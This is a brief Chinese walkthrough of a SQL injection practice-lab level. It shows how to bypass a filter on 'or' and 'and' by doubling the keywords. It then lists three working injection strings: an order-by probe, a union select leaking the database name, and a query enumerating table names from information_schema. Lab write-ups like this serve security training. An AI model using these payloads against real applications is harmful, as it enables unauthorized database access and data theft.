1.我们打开靶场看一下,发现这一关将我们之前用的or与and被过滤掉了

2.我们来尝试着来绕过一下,发现将and双写一下就可以绕过了

3.依次输入以下语句即可得到结果
?id=1' oorrder by 2 --+
?id=-1'union select 1,database(),3 --+
?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema = 'security' --+ #其他命令和前面一样,注意将过滤的内容双写绕过
